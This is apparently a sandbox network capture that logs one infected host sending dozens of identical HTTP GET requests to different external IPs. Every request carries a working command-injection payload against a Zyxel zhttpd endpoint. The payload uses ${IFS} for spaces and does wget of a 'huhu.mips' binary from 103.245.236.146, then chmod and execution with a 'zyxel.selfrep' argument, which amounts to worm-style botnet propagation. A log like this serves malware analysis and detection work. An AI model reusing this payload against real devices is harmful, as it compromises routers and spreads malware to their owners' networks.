                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6385192.168.2.13351548.184.184.42443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216089010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6386192.168.2.1342500192.83.113.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216145992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6387192.168.2.1356616184.249.254.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216166973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6388192.168.2.135202694.227.157.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216223955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6389192.168.2.1350112147.62.141.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216279030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6390192.168.2.133553853.147.53.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216306925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6391192.168.2.1346170122.20.205.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216345072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6392192.168.2.134761492.146.77.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216381073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6393192.168.2.133659464.104.110.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216432095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6394192.168.2.1359792179.28.253.108443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216484070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6395192.168.2.135910050.0.145.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216526031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6396192.168.2.135509875.170.229.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216567039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6397192.168.2.1358050196.49.183.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216595888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6398192.168.2.1349500210.210.134.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216624975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6399192.168.2.134800612.161.110.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216670990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6400192.168.2.1350448111.31.234.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216706991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6401192.168.2.1335028154.139.250.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216737986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6402192.168.2.1352122217.44.39.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216777086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6403192.168.2.1355954136.138.135.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216819048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6404192.168.2.1349346190.102.51.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216878891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6405192.168.2.135564217.140.61.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216882944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6406192.168.2.1334862201.66.249.228443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216909885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6407192.168.2.1335788116.124.140.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216952085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6408192.168.2.1341858167.1.45.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.216989994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6409192.168.2.1357192175.18.92.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217031002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6410192.168.2.134813276.222.211.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217071056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6411192.168.2.135716217.222.233.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217123985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6412192.168.2.134835648.207.124.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217161894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6413192.168.2.1345340143.8.68.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217179060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6414192.168.2.1349824212.106.204.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217242956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6415192.168.2.135919694.169.219.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217283010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6416192.168.2.134886636.168.207.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217318058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6417192.168.2.1358498113.138.222.161443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217381954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6418192.168.2.1333754209.59.148.254443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217434883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6419192.168.2.135603484.195.242.35443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217459917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6420192.168.2.134675039.122.184.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217504025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6421192.168.2.1354572141.17.203.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217539072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6422192.168.2.133408635.154.252.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217595100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6423192.168.2.133923290.212.5.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217650890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6424192.168.2.133831053.229.244.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217700958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6425192.168.2.134417468.46.121.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217734098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6426192.168.2.1339558157.99.251.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217777014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6427192.168.2.133689490.243.240.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217818975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6428192.168.2.1353754178.157.134.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217856884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6429192.168.2.1346528183.225.199.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217906952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6430192.168.2.134816654.159.172.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217942953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6431192.168.2.1342758114.13.208.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.217983961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6432192.168.2.1336946213.205.132.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218023062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6433192.168.2.135841454.62.214.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218070984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6434192.168.2.135088074.13.177.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218123913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6435192.168.2.1353718144.199.178.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218175888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6436192.168.2.135239636.189.110.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218189001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6437192.168.2.1352944198.52.17.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218238115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6438192.168.2.1358626222.233.230.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218276978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6439192.168.2.135029498.85.30.97443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218307018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6440192.168.2.13591901.214.64.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218342066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6441192.168.2.1348820122.7.162.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218389034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6442192.168.2.1340288211.119.46.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218442917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6443192.168.2.1352412187.88.19.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218477011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6444192.168.2.134959813.46.7.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218522072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6445192.168.2.135499252.140.102.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218549013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6446192.168.2.134811849.61.48.166443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218615055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  6447192.168.2.1348678107.226.145.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:04.218630075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
